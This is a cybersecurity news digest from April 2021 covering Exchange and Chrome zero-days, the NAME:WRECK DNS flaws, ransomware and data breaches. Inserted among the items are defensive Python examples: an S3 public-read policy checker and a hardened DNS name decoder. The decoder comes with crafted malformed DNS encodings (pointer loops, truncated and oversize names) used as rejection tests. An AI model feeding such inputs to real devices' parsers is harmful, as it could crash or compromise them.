Adobe on Tuesday announced patches for several vulnerabilities in four of its products, including critical code execution and buffer overflow flaws affecting Photoshop and Bridge.Security Week
April 14, 2021 – Business
SolarWinds says dealing with hack fallout cost at least $18 million Full Text
Abstract
Texas-based SolarWinds Corp said the sprawling breach stemming from the compromise of its flagship software product has cost the company at least $18 million in the first three months of 2021.Reuters
April 14, 2021 – Vulnerabilities
PoC Exploit Released for Unpatched Flaw Affecting Chromium-Based Browsers Full Text
Abstract
A researcher has made public a proof-of-concept (PoC) exploit for a recently discovered vulnerability affecting Chrome, Edge, and other Chromium-based web browsers. The researchers demonstrated the exploit against both Chrome and Microsoft Edge.Security Week
April 13, 2021 – Vulnerabilities
Update Your Chrome Browser to Patch 2 New In-the-Wild 0-Day Exploits Full Text
Abstract
Google on Tuesday released a new version of Chrome web-browsing software for Windows, Mac, and Linux with patches for two newly discovered security vulnerabilities for both of which it says exploits exist in the wild, allowing attackers to engage in active exploitation. One of the two flaws concerns an insufficient validation of untrusted input in its V8 JavaScript rendering engine (CVE-2021-21220), which was demonstrated by Dataflow Security's Bruno Keith and Niklas Baumstark at the Pwn2Own 2021 hacking contest last week. While Google moved to fix the flaw quickly, security researcher Rajvardhan Agarwal published a working exploit over the weekend by reverse-engineering the patch that the Chromium team pushed to the open-source component, a factor that may have played a crucial role in the release. UPDATE: Agarwal, in an email to The Hacker News, confirmed that there's one more vulnerability affecting Chromium-based browsers that has been patched in the latest versThe Hacker News
April 13, 2021 – Vulnerabilities
NSA Discovers New Vulnerabilities Affecting Microsoft Exchange Servers Full Text
Abstract
In its April slate of patches, Microsoft rolled out fixes for a total of 114 security flaws, including an actively exploited zero-day and four remote code execution bugs in Exchange Server. Of the 114 flaws, 19 are rated as Critical, 88 are rated Important, and one is rated Moderate in severity. Chief among them is CVE-2021-28310, a privilege escalation vulnerability in Win32k that's said to be under active exploitation, allowing attackers to elevate privileges by running malicious code on a target system. Cybersecurity firm Kaspersky, which discovered and reported the flaw to Microsoft in February, linked the zero-day exploit to a threat actor named Bitter APT, which was found exploiting a similar flaw (CVE-2021-1732) in attacks late last year. "It is an escalation of privilege (EoP) exploit that is likely used together with other browser exploits to escape sandboxes or get system privileges for further access," Kaspersky researcher Boris Larin said. NSThe Hacker News
April 13, 2021 – Government
FBI nuked web shells from hacked Exchange Servers without telling owners Full Text
Abstract
A court-approved FBI operation was conducted to remove web shells from compromised US-based Microsoft Exchange servers without first notifying the servers' owners.BleepingComputer
April 13, 2021 – Government
FBI launches operation to remove malware from computers in US Full Text
Abstract
A court in Texas has authorized the FBI to fix malware in hundreds of hacked servers in the U.S. running certain versions of Microsoft Exchange Server software.The Hill
April 13, 2021 – Government
DoJ used court order to thwart ‘hundreds’ of Exchange Server web shells Full Text
Abstract
The move is unprecedented, and implies an understanding that cyber risks should be addressed with the same urgency of other threats to national security and critical infrastructure.SCMagazine
April 13, 2021 – Ransomware
Capcom: Ransomware gang used old VPN device to breach the network Full Text
Abstract
Capcom has released a new update about the ransomware attack it suffered last year, detailing how the hackers gained access to the network, compromised devices, and stole personal information belonging to thousands of individuals.BleepingComputer
April 13, 2021 – Attack
Attacker hacked one Microsoft Exchange server to gain access to others Full Text
Abstract
The tactic is sophisticated, with firewalls unlikely to block traffic between Exchange servers and potentially giving such traffic a pass in terms of content inspection.SCMagazine
April 13, 2021 – General
Hillicon Valley: Microsoft (re)patch requested | International cyber threats growing | New York Times tech workers unionize Full Text
Abstract
Today: Federal agencies urged organizations running a Microsoft email application to immediately patch their systems to prevent hackers from exploiting newly discovered vulnerabilities. Meanwhile, the Office of the Director of National Intelligence released the annual worldwide threats report which highlighted cyber incidents as a key national security threat, and tech workers at the New York Times launched a union.The Hill
April 13, 2021 – Government
CISA gives federal agencies until Friday to patch Exchange servers Full Text
Abstract
The US Cybersecurity and Infrastructure Security Agency (CISA) has ordered federal agencies to install newly released Microsoft Exchange security updates by Friday.BleepingComputer
April 13, 2021 – General
Experts see ‘unprecedented’ increase in hackers targeting electric grid Full Text
Abstract
The leader of a key information sharing group said Tuesday that organizations involved in the electricity sector had seen an "unprecedented" increase in cyber threats during the COVID-19 pandemic.The Hill
April 13, 2021 – Vulnerabilities
Microsoft fixes 2 critical Exchange Server flaws reported by the NSA Full Text
Abstract
Microsoft Patch Tuesday security updates address four high and critical severity vulnerabilities in Microsoft Exchange Server that were reported by the NSA. Microsoft Patch Tuesday security updates released today have addressed four critical and high severity...Security Affairs
April 13, 2021 – Vulnerabilities
How the NAME:WRECK Bugs Impact Consumers, Businesses Full Text
Abstract
How this class of vulnerabilities will impact millions of connected devices and potentially wreck the day of IT security professionals.Threatpost
April 13, 2021 – Government
Federal agencies urge groups to patch systems over new Microsoft vulnerabilities Full Text
Abstract
Federal agencies urged organizations using a Microsoft email application to immediately patch their systems to stop malicious hackers from exploiting newly discovered vulnerabilities.The Hill
April 13, 2021 – Malware
COVID-Related Threats, PowerShell Attacks Lead Malware Surge Full Text
Abstract
Researchers measured 648 new malware threats every minute during Q4 2020.Threatpost
April 13, 2021 – Vulnerabilities
NSA discovers critical Exchange Server vulnerabilities, patch now Full Text
Abstract
Microsoft today has released security updates for Exchange Server that address a set of four vulnerabilities with severity scores ranging from high to critical.BleepingComputer
April 13, 2021 – General
Cyber-bullied Teen Takes Own Life Full Text
Abstract
New York teen kills himself after being bullied and blackmailed onlineInfosecurity Magazine
April 13, 2021 – Business
Cybersecurity Services Market to be Worth $192.7bn Full Text
Abstract
New research suggests global cybersecurity market will be worth $192.7bn by 2028Infosecurity Magazine
April 13, 2021 – Outage
Cyber-Attack Shutters Half of Tasmania’s Casinos Full Text
Abstract
Casino operator Federal Group forced to close venues after ransomware attackInfosecurity Magazine
April 13, 2021 – Phishing
Tax Phish Swims Past Google Workspace Email Security Full Text
Abstract
Crooks are looking to harvest email credentials with a savvy campaign that uses the Typeform service to host the phishing page.Threatpost
April 13, 2021 – Malware
New Linux, macOS malware hidden in fake Browserify NPM package Full Text
Abstract
A new malicious package has been spotted this week on the npm registry, which targets NodeJS developers using Linux and Apple macOS operating systems for its recon activities. The malicious package is called "web-browserify." It imitates the popular Browserify npm component, downloaded over 160 million times over its lifetime.BleepingComputer
April 13, 2021 – General
Intel assessment warns of increasing national security threats from China, Russia Full Text
Abstract
An annual worldwide threats assessment made public by the Office of the Director of National Intelligence (ODNI) on Tuesday warned of increasing cyber, technological, and military threats from China and Russia, particularly as the COVID-19 pandemic continues.The Hill
April 13, 2021 – Vulnerabilities
Microsoft closes new critical Exchange vulnerability, suggests patch ‘as soon as possible’ Full Text
Abstract
The alert about new Exchange bugs comes soon after on-premises Exchange customers were told to patch against a campaign actively exploiting a zero-day vulnerability.SCMagazine
April 13, 2021 – Vulnerabilities
Adobe addresses two critical vulnerabilities in Photoshop Full Text
Abstract
Adobe has addressed security vulnerabilities in Adobe Photoshop, Adobe Digital Editions, Adobe Bridge, and RoboHelp. Adobe has fixed ten security vulnerabilities in Adobe Photoshop, Adobe Digital Editions, Adobe Bridge, and RoboHelp. Seven vulnerabilities...Security Affairs
April 13, 2021 – Vulnerabilities
Microsoft April 2021 Patch Tuesday fixes 108 flaws, 5 zero-days Full Text
Abstract
Today is Microsoft's April 2021 Patch Tuesday, and with it comes five zero-day vulnerabilities and more Critical Microsoft Exchange vulnerabilities. It has been a tough couple of months for Windows and Microsoft Exchange admins, and it looks like April won't be any easier, so please be nice to your IT staff today.BleepingComputer
April 13, 2021 – Vulnerabilities
Adobe Patches Slew of Critical Security Bugs in Bridge, Photoshop Full Text
Abstract
The security bugs could open the door for arbitrary code-execution and full takeover of targeted machines.Threatpost
April 13, 2021 – Business
Fitch Partners with SecurityScorecard to Help Investors Assess Businesses’ Cyber-Risk Full Text
Abstract
The growing threat landscape has made investors more concerned about companies' cybersecurity posturesInfosecurity Magazine
April 13, 2021 – Vulnerabilities
Experts released PoC exploit code for a critical RCE in QNAP NAS devices Full Text
Abstract
The exploit code for a remote code execution vulnerability affecting QNAP network-attached storage (NAS) devices that run the Surveillance Station video management system is available online. An exploit for a remote code execution vulnerability affecting...Security Affairs
April 13, 2021 – Government
Joe Biden Appointed two Former Senior NSA Officials for Senior Cyber Security Roles Full Text
Abstract
Joe Biden, the President of the United States of America, has appointed two senior ex-National Security Agency (NSA) executives for key cyber...Cyber Security News
April 13, 2021 – Malware
QBot malware is back replacing IcedID in malspam campaigns Full Text
Abstract
Malware distributors are rotating payloads once again, switching between trojans that are many times an intermediary stage in a longer infection chain.BleepingComputer
April 13, 2021 – Vulnerabilities
Adobe fixes critical vulnerabilities in Photoshop and Digital Editions Full Text
Abstract
Adobe has released security updates that address security vulnerabilities in Adobe Photoshop, Adobe Digital Editions, Adobe Bridge, and RoboHelp.BleepingComputer
April 13, 2021 – Privacy
Brave browser disables Google’s FLoC tracking system Full Text
Abstract
Brave, a Chromium-based browser, has removed Federated Learning of Cohorts (FLoC), Google's controversial alternative identifier to third-party cookies for tracking users across websites.ZDNet
April 13, 2021 – General
Victims are spotting cyber attacks much more quickly - but there’s a catch Full Text
Abstract
The amount of time cybercriminals are spending inside compromised networks is dropping. But while that might sound like a positive development, one reason hackers are spending less time inside networks is because of the surge in ransomware attacks.ZDNet
April 13, 2021 – Phishing
Watch out for this W-2 phishing scam targeting the 2021 tax season Full Text
Abstract
With the United States tax season in high gear, threat actors have sprung into action with a recent tax document phishing scam that abuses Typeform forms to steal your login credentials.BleepingComputer
April 13, 2021 – Business
Data of 500 Million LinkedIn Users Scraped and Being Sold Online Full Text
Abstract
LinkedIn is the most recent victim of a massive data breach and data of over 500 million of its users has been...Cyber Security News
April 13, 2021 – Government
US Federal Reserve Chairman Jerome Powell Says Cyberattacks are the Number One Threat to the Global Financial System Full Text
Abstract
Cyberattacks are now the foremost risk to the global financial system, even more so than the lending and liquidity risks that led to the 2008 financial crisis, according to Federal Reserve Chairman Jerome Powell.CNN Money
April 13, 2021 – Vulnerabilities
New NAME:WRECK Vulnerabilities Impact Nearly 100 Million IoT Devices Full Text
Abstract
Security researchers have uncovered nine vulnerabilities affecting four TCP/IP stacks, impacting more than 100 million consumer and enterprise devices, that could be exploited by an attacker to take control of a vulnerable system. Dubbed "NAME:WRECK" by Forescout and JSOF, the flaws are the latest in a series of studies undertaken as part of an initiative called Project Memoria to study the security of widely used TCP/IP stacks that various vendors incorporate in their firmware to offer internet and network connectivity features. "These vulnerabilities relate to Domain Name System (DNS) implementations, causing either Denial of Service (DoS) or Remote Code Execution (RCE), allowing attackers to take target devices offline or to take control over them," the researchers said. The name comes from the fact that parsing of domain names can break (i.e., "wreck") DNS implementations in TCP/IP stacks, adding to a recent uptick in vulnerabilities such as ... The Hacker News
April 13, 2021 – Covid-19
McAfee: COVID-19 Themed Attacks Continue to Surge Full Text
Abstract
Overall malware detections reached 648 threats per minute in Q4 2020Infosecurity Magazine
April 13, 2021 – Vulnerabilities
Millions of devices impacted by NAME:WRECK flaws Full Text
Abstract
Security experts disclosed nine flaws, collectively tracked as NAME:WRECK, affecting implementations of the DNS protocol in popular TCP/IP network communication stacks. Security Affairs
April 13, 2021 – Breach
Brokerage Firm Upstox Exposes 2.5 Million Customers Sensitive Information Full Text
Abstract
Upstox suffered a security breach resulting in the exposure of 2.5 million users' sensitive information online from an unsecured AWS S3 bucket. Cyber Security News
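The Upstox item above comes down to a bucket that anyone could read. As an added example (not Upstox's or AWS's code), the following Python checks one bucket policy document for statements that grant anonymous read or list access. The policy it runs on is constructed for the example; the bucket name, Sids, account ID and VPC endpoint ID are placeholders. It is a static review of a policy document and complements, rather than replaces, S3 Block Public Access at the account level; it also ignores ACL-based grants and the NotPrincipal/NotAction forms, which need their own checks.

```python
"""Find bucket-policy statements that grant anonymous read access.

Added example, not Upstox's or AWS's code. A bucket policy is JSON; a
statement hands data to the world when it Allows, names the wildcard
principal, and covers an S3 read or list action. A Condition may narrow
that (for example to one VPC endpoint), so such statements are reported
separately for review rather than silently accepted. NotPrincipal and
NotAction statements and bucket/object ACLs are out of scope here.
"""
import fnmatch
import json

READ_ACTIONS = ("s3:GetObject", "s3:GetObjectVersion", "s3:ListBucket")


def _as_list(value):
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _anonymous(principal):
    """True for Principal "*" or {"AWS": "*"}; both mean everyone."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS"))
    return False


def _covers_read(actions):
    """IAM action names are case-insensitive and may use '*' wildcards."""
    for pattern in _as_list(actions):
        for action in READ_ACTIONS:
            if fnmatch.fnmatchcase(action.lower(), pattern.lower()):
                return True
    return False


def _anonymous_read_kind(statement):
    """None, 'unconditional' or 'conditional' for one statement."""
    if statement.get("Effect") != "Allow":
        return None
    if not _anonymous(statement.get("Principal")):
        return None
    if not _covers_read(statement.get("Action")):
        return None
    return "conditional" if statement.get("Condition") else "unconditional"


def public_read_statements(policy_json):
    """Return [(Sid or #index, kind)] for every anonymous-read grant."""
    policy = json.loads(policy_json)
    findings = []
    for i, st in enumerate(_as_list(policy.get("Statement"))):
        kind = _anonymous_read_kind(st)
        if kind:
            findings.append((st.get("Sid", f"#{i}"), kind))
    return findings


def strip_unconditional_public_reads(policy_json):
    """Return the policy with unconditional anonymous-read grants removed.

    Conditional grants are left in place on purpose: a human has to decide
    whether the condition really restricts the audience.
    """
    policy = json.loads(policy_json)
    policy["Statement"] = [st for st in _as_list(policy.get("Statement"))
                           if _anonymous_read_kind(st) != "unconditional"]
    return json.dumps(policy, indent=2)


# Constructed sample policy; every identifier in it is a placeholder.
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-kyc-docs/*"},
        {"Sid": "WildcardList", "Effect": "Allow", "Principal": {"AWS": "*"},
         "Action": ["s3:List*"], "Resource": "arn:aws:s3:::example-kyc-docs"},
        {"Sid": "VpcOnly", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-kyc-docs/*",
         "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-0123456789abcdef0"}}},
        {"Sid": "AppRole", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:role/app"},
         "Action": "s3:*", "Resource": "arn:aws:s3:::example-kyc-docs/*"},
        {"Sid": "DenyInsecure", "Effect": "Deny", "Principal": "*",
         "Action": "s3:*", "Resource": "arn:aws:s3:::example-kyc-docs/*",
         "Condition": {"Bool": {"aws:SecureTransport": "false"}}},
    ],
})

if __name__ == "__main__":
    for sid, kind in public_read_statements(SAMPLE_POLICY):
        print(f"{sid}: anonymous read ({kind})")
    print(strip_unconditional_public_reads(SAMPLE_POLICY))
```

On a live account the same function can be fed the output of `aws s3api get-bucket-policy --bucket NAME --query Policy --output text`, one bucket at a time.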
April 13, 2021 – Business
Talon Cyber Security raises $26M to further develop its technology and expand the development team Full Text
Abstract
Talon Cyber Security announced that it has secured $26 million in seed funding from Lightspeed Venture Partners, Team8, serial entrepreneur Zohar Zisapel, and leading cyber angel investors.Help Net Security
April 13, 2021 – Malware
Hackers Using Website’s Contact Forms to Deliver IcedID Malware Full Text
Abstract
Microsoft has warned organizations of a "unique" attack campaign that abuses contact forms published on websites to deliver malicious links to businesses via emails containing fake legal threats, in what's yet another instance of adversaries abusing legitimate infrastructure to mount evasive campaigns that bypass security protections. "The emails instruct recipients to click a link to review supposed evidence behind their allegations, but are instead led to the download of IcedID, an info-stealing malware," the company's threat intelligence team said in a write-up published last Friday. IcedID is a Windows-based banking trojan that's used for reconnaissance and exfiltration of banking credentials, alongside features that allow it to connect to a remote command-and-control (C2) server to deploy additional payloads such as ransomware and malware capable of performing hands-on-keyboard attacks, stealing credentials, and moving laterally across affected ... The Hacker News
April 13, 2021 – General
Destructive Attacks Surged in 2020 for Financial Institutions Full Text
Abstract
VMware warns of sophisticated counter incident response effortsInfosecurity Magazine
April 13, 2021 – Vulnerabilities
Expert publicly released Chromium-based browsers exploit demonstrated at Pwn2Own 2021 Full Text
Abstract
Indian security researcher Rajvardhan Agarwal has publicly released proof-of-concept (PoC) exploit code for a vulnerability impacting Google Chrome and other Chromium-based browsers. Security Affairs
April 13, 2021 – General
Network Attack Trends for Winter 2020 Full Text
Abstract
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%).Palo Alto Networks
April 13, 2021 – General
Detecting the “Next” SolarWinds-Style Cyber Attack Full Text
Abstract
The SolarWinds attack, which succeeded by utilizing the Sunburst malware, shocked the cyber-security industry. This attack achieved persistence and was able to evade internal systems long enough to gain access to the source code of the victim. Because of the far-reaching SolarWinds deployments, the perpetrators were also able to infiltrate many other organizations, looking for intellectual property and other assets. Among the co-victims: US government, government contractors, Information Technology companies, and NGOs. Terabytes of data of 18,000 customers were stolen after a trojanized version of the SolarWinds application was installed in the internal structures of the clients. Looking at the technical capabilities of the malware, as you will see, this particular attack was quite impressive. A particular file, named SolarWinds.Orion.Core.BusinessLayer.dll, is a SolarWinds digitally signed component of the Orion software framework. The threat actors installed a backdoor that ... The Hacker News
April 13, 2021 – Vulnerabilities
Name:Wreck Bugs Could Impact 100M IoT Devices Full Text
Abstract
Exploitation could deny service or enable remote code executionInfosecurity Magazine
April 13, 2021 – Outage
Expired certificate caused a Pulse Secure VPN global scale outage Full Text
Abstract
Pulse Secure VPN users were not able to log in due to the expiration of a code signing certificate used to digitally sign and verify software components. Security Affairs
April 13, 2021 – Business
Cybersecurity training startup Hack The Box raises $10.6M Series A led by Paladin Capital Full Text
Abstract
Cybersecurity training startup Hack The Box has raised a Series A investment round of $10.6 million, led by Paladin Capital Group and joined by Osage University Partners, Brighteye Ventures, and existing investors Marathon Venture Capital.TechCrunch
April 13, 2021 – Ransomware
Food Shortages at Dutch Supermarkets After Ransomware Outage Full Text
Abstract
Logistics provider Bakker Logistiek suffered attack over EasterInfosecurity Magazine
April 13, 2021 – Phishing
New FormBook Variant Delivered in Phishing Campaign Full Text
Abstract
FortiGuard Labs captured a phishing campaign that was sending a Microsoft PowerPoint document as an email attachment to spread the new variant of the infamous FormBook malware.Fortinet
April 13, 2021 – Vulnerabilities
New DNS vulnerabilities have the potential to impact millions of devices Full Text
Abstract
These vulnerabilities affect four popular TCP/IP stacks – namely FreeBSD, IPnet, Nucleus NET, and NetX – which are commonly present in well-known IT software and popular IoT/OT firmware and have the potential to impact millions of IoT devices.Help Net Security
April 13, 2021 – Vulnerabilities
NAME:WRECK DNS vulnerabilities affect over 100 million devices Full Text
Abstract
Security researchers today disclosed nine vulnerabilities affecting implementations of the Domain Name System protocol in popular TCP/IP network communication stacks running on at least 100 million devices.BleepingComputer
April 13, 2021 – Vulnerabilities
‘Name:Wreck’ is the latest collision between TCP/IP and the standards process Full Text
Abstract
The set of nine vulnerabilities in four popular TCP/IP stacks, including FreeBSD, shows once again how complexities in the TCP/IP standards can ultimately lead to vulnerable products. SCMagazine
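The NAME:WRECK items above (the Hacker News, Security Affairs, Help Net Security, BleepingComputer and SCMagazine entries) all turn on one thing: how a TCP/IP stack decodes DNS names, and in particular the RFC 1035 section 4.1.4 compression pointers. As an added example, not code from Forescout, JSOF or any of the affected stacks, the Python below makes the checks a name decoder needs so that a crafted reply cannot read past the buffer, chase pointers forever, or yield an over-long name, and then rejects a few constructed hostile encodings. The sample message and the hostile blobs are constructed for the example, not captured traffic.

```python
"""Bounds-checked DNS name decoding (RFC 1035 section 4.1.4 compression).

Added example, not code from Forescout, JSOF or any of the affected stacks.
It shows the checks a DNS name parser has to make so that a crafted reply
cannot read past the buffer, chase compression pointers forever, or yield
an over-long name, which are the failure classes grouped under NAME:WRECK.
"""

MAX_NAME = 255   # RFC 1035 s2.3.4: whole name incl. length octets and root


class DnsParseError(ValueError):
    """Any malformed or hostile name encoding."""


def read_name(msg, offset):
    """Decode the name at msg[offset:].

    Returns (name as bytes with a trailing dot, offset of the first octet
    after the name as it sits in the message).  A compression pointer may
    only target an offset strictly before the start of the label run it
    occurs in, so every jump moves strictly backwards and a pointer loop
    is impossible by construction; no hop counter is needed.
    """
    labels = []
    consumed = 0          # octets of the decoded name, for the 255 limit
    pos = offset
    run_start = offset    # where the current run of labels began
    resume = None         # set at the first pointer: where the caller continues

    while True:
        if pos >= len(msg):
            raise DnsParseError(f"name at {offset} runs past end of message")
        length = msg[pos]

        if length & 0xC0 == 0xC0:             # 11xxxxxx: compression pointer
            if pos + 1 >= len(msg):
                raise DnsParseError(f"truncated pointer at {pos}")
            target = ((length & 0x3F) << 8) | msg[pos + 1]
            if resume is None:
                resume = pos + 2
            if target >= run_start:
                raise DnsParseError(
                    f"pointer at {pos} to {target} does not go backwards")
            pos = run_start = target
            continue

        if length & 0xC0:                     # 01xxxxxx / 10xxxxxx: reserved
            raise DnsParseError(f"reserved label type 0x{length:02x} at {pos}")

        if length == 0:                       # root label ends the name
            pos += 1
            break

        # 00xxxxxx: ordinary label, at most 63 octets by construction.
        consumed += 1 + length
        if consumed + 1 > MAX_NAME:           # +1 for the root octet to come
            raise DnsParseError("name longer than 255 octets")
        if pos + 1 + length > len(msg):
            raise DnsParseError(f"label at {pos} runs past end of message")
        labels.append(bytes(msg[pos + 1:pos + 1 + length]))
        pos += 1 + length

    if resume is None:
        resume = pos
    return (b".".join(labels) + b"." if labels else b"."), resume


def parse_question(msg, offset):
    """Decode one question entry: (QNAME, QTYPE, QCLASS, next offset)."""
    name, pos = read_name(msg, offset)
    if pos + 4 > len(msg):
        raise DnsParseError("question truncated after QNAME")
    qtype = int.from_bytes(msg[pos:pos + 2], "big")
    qclass = int.from_bytes(msg[pos + 2:pos + 4], "big")
    return name, qtype, qclass, pos + 4


def is_rejected(blob):
    """True if the decoder refuses the name at offset 0 of blob."""
    try:
        read_name(blob, 0)
    except DnsParseError:
        return True
    return False


# Constructed sample, not captured traffic: a 12-octet header, one question
# for www.example.com A/IN, then a name "mail" + pointer to "example.com"
# at offset 16 (0xC010).
SAMPLE = (
    b"\x00" * 12
    + b"\x03www\x07example\x03com\x00" + b"\x00\x01" + b"\x00\x01"
    + b"\x04mail\xc0\x10"
)

# Constructed hostile encodings that a bounds-checked decoder must reject.
HOSTILE = {
    "self_loop": b"\xc0\x00",                        # pointer to itself
    "forward_pointer": b"\xc0\x03\x00\x01a\x00",     # jumps ahead of itself
    "truncated_label": b"\x05ab",                    # claims 5 octets, has 2
    "oversize_name": (b"\x3f" + b"a" * 63) * 4 + b"\x00",   # 257 octets
}

if __name__ == "__main__":
    print(parse_question(SAMPLE, 12))
    print(read_name(SAMPLE, 33))
    for tag, blob in HOSTILE.items():
        print(tag, "rejected" if is_rejected(blob) else "ACCEPTED")
```

The backwards-only rule is stricter than RFC 1035 strictly requires but is what every robust resolver enforces in practice; it is the single check that turns "pointer loop" and "pointer past the end" from crashes into a parse error.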
April 12, 2021 – Vulnerabilities
Google Chrome, Microsoft Edge zero-day vulnerability shared on Twitter Full Text
Abstract
A security researcher has dropped a zero-day remote code execution vulnerability on Twitter that works on the current version of Google Chrome and Microsoft Edge.BleepingComputer
April 12, 2021 – Policy and Law
Texas Man Charged With Intent of Planning to Kill 70% of the Internet Full Text
Abstract
A Texas man was charged on April 8, 2021 with plotting to attack data centers. He had planned to blow up... Cyber Security News
April 12, 2021 – Ransomware
REvil Breaks Safe Mode Again with Auto-login Feature Full Text
Abstract
Recent research found that REvil ransomware has repurposed an attack technique that involves changing the user's system login password and forcing a system reboot so that the malware can encrypt files. Cyware Alerts - Hacker News
April 12, 2021 – General
Hillicon Valley: Biden nominates former NSA deputy director to serve as cyber czar | Apple to send witness to Senate hearing after all | Biden pressed on semiconductor production amid shortage Full Text
Abstract
President Biden rolled out a list of nominees to fill key cybersecurity positions, which drew support from lawmakers on both sides of the aisle. Meanwhile, top senators on the antitrust subcommittee said Apple will send a witness to a hearing later this month on app store competition after they pushed back on what they called the tech giant's refusal to participate. And as more people in the U.S. get their COVID-19 vaccines, Uber said it recorded its highest monthly gross bookings in company history in March. The Hill
April 12, 2021 – Breach
Indian Brokerage Firm Upstox Suffers Data Breach Leaking 2.5 Millions Users’ Data Full Text
Abstract
Online trading and discount brokerage platform Upstox has become the latest Indian company to suffer a security breach of its systems, resulting in the exposure of sensitive information of approximately 2.5 million users on the dark web. The leaked information includes names, email addresses, dates of birth, bank account information, and about 56 million know your customer (KYC) documents pulled from the company's server. The breach was first disclosed by independent researcher Rajshekhar Rajaharia on April 11. It's not immediately clear when the incident occurred. Reacting to the development, the company said it had recently upgraded its security systems following reports of "unauthorized access into our database" while stressing that users' funds and securities remained protected. As a precaution, besides initiating a secure password reset of users' accounts, Upstox said it restricted access to the impacted database, implying it was a ... The Hacker News
April 12, 2021 – General
UK Sports Teams Boycott Social Media Full Text
Abstract
Sporting stars step back from social media to raise awareness of online abuseInfosecurity Magazine
April 12, 2021 – Government
Two former NSA Officials appointed by Joe Biden for prominent cyber roles Full Text
Abstract
President Joe Biden has appointed two former senior National Security Agency (NSA) officials to two prominent cyber roles in his administration. Security Affairs
April 12, 2021 – General
61 percent of employees fail basic cybersecurity quiz Full Text
Abstract
Nearly 70% of employees polled in a new survey said they recently received cybersecurity training from their employers, yet 61% nevertheless failed when asked to take a basic quiz on the topic. This was one of the leading findings of a research study – conducted by TalentLMS on behalf of Kenna Security – that sought…SCMagazine
April 12, 2021 – Vulnerabilities
CS:GO, Valve Source games vulnerable to hacking using Steam invites Full Text
Abstract
A group of security researchers known as the Secret Club took to Twitter to report a remote code execution bug in the Source 3D game engine developed by Valve and used for building games with tens of millions of unique players. BleepingComputer
April 12, 2021 – Phishing
Golden Chickens and New Spear-Phishing Campaign Full Text
Abstract
A new spear-phishing campaign has been targeting LinkedIn users with fake job offers in an attempt to attain control over victims’ computers using a sophisticated backdoor trojan called more_eggs.Cyware Alerts - Hacker News
April 12, 2021 – Government
Lawmakers, industry call on Biden to fund semiconductor production amid shortage Full Text
Abstract
A bipartisan group of more than 70 House and Senate lawmakers on Monday called on President Biden to support funds for semiconductor research and manufacturing as Biden hosted a meeting with technology leaders to discuss a critical shortage in chips.The Hill
April 12, 2021 – Government
Biden Nominates More Ex-NSA Officials to Top Cybersecurity Roles Full Text
Abstract
Two former National Security Agency workers selected by Biden for senior cyber jobsInfosecurity Magazine
April 12, 2021 – Business
Microsoft is open sourcing CyberBattleSim Enterprise Environment Simulator Full Text
Abstract
Microsoft has released CyberBattleSim, a Python-based enterprise environment simulator, as open source. Security Affairs
April 12, 2021 – Ransomware
Ransomware’s evolving tools and technical tactics confuse forensic analysis Full Text
Abstract
Adversaries attempt to gain an upper hand by compromising the Active Directory, encrypting VM environments, and abusing Rclone.SCMagazine
April 12, 2021 – Ransomware
Dutch supermarkets run out of cheese after ransomware attack Full Text
Abstract
A ransomware attack against conditioned warehousing and transportation provider Bakker Logistiek has caused a cheese shortage in Dutch supermarkets.BleepingComputer
April 12, 2021 – Ransomware
Close Ties Surface Between Mount Locker and Astro Locker Team Ransomware Groups Full Text
Abstract
Researchers are looking at an uncanny resemblance between the ransomware groups Mount Locker and Astro Locker Team. Experts suggest a possible tie-up to expedite Mount Locker's onboarding as a RaaS operation. Cyware Alerts - Hacker News
April 12, 2021 – Government
Bipartisan lawmakers signal support for Biden cybersecurity picks Full Text
Abstract
Key lawmakers on Monday expressed support for President Biden’s picks to lead federal efforts on securing the nation against cyber threats.The Hill
April 12, 2021 – Attack
Iran Nuclear Facility Suffers Cyber-Attack Full Text
Abstract
Israeli public media claims Israel was behind a cyber-attack on Iran’s Natanz nuclear complexInfosecurity Magazine
April 12, 2021 – Government
Biden scores praise for nominations of White House, DHS cyber leaders Full Text
Abstract
The announcement ends months of speculation over the key positions, during which time the government has had to face fallout from both the Solarwinds and Hafnium Exchange Server campaigns without leadership in place.SCMagazine
April 12, 2021 – Malware
New Malware Downloader Spotted in Targeted Campaigns Full Text
Abstract
A relatively sophisticated new malware downloader, dubbed as Saint Bot, has surfaced in recent weeks that, though not widespread yet, appears to be gaining momentum. The downloader is being used to drop stealers on compromised systems.Dark Reading
April 12, 2021 – Covid-19
Cyber-criminals Increasingly Leveraging Debates About Travel During #COVID19 to Launch Attacks Full Text
Abstract
A 93% rise in malicious COVID-related domains created using the word 'travel' has been detectedInfosecurity Magazine
April 12, 2021 – Ransomware
How ransomware gangs are connected, sharing resources and tactics Full Text
Abstract
In a whitepaper entitled “Ransom Mafia – Analysis of the World’s First Ransomware Cartel”, DiMaggio and his team aimed to provide an analytical assessment on whether there is indeed a ransomware cartel.Malwarebytes Labs
April 12, 2021 – Business
British cyber security firm Darktrace targets $4 billion London listing Full Text
Abstract
Darktrace, the British cybersecurity firm fired the gun on its $4 billion London listing on Monday, aiming to raise new funds to accelerate product development and strengthen its balance sheet.Reuters
April 12, 2021 – Vulnerabilities
Zerodium Will Triple Payouts for RCE Exploits for WordPress CMS Full Text
Abstract
The exploit purchase platform is currently tempting exploit developers and vendors with a $300,000 payout, three times more than the normal cost. The announcement was made via Twitter.Heimdal Security
April 12, 2021 – Government
Biden makes nominations for top cyber posts Full Text
Abstract
U.S. President Joe Biden is nominating Chris Inglis to be the National Cyber Director and Jen Easterly to be director of the Cybersecurity and Infrastructure Security Agency, the White House said on Monday.Reuters
April 12, 2021 – Outage
Pulse Secure VPN users can’t login due to expired certificate Full Text
Abstract
Users worldwide cannot connect to Pulse Secure VPN devices after a code signing certificate used to digitally sign and verify software components has expired.BleepingComputer
April 12, 2021 – Breach
Hackers Compromised APKPure Android App Store to Deliver Malware Full Text
Abstract
APKPure, a popular third-party Android app store and an alternative to Google's official Play Store, was infected with malware this week, ... Cyber Security News
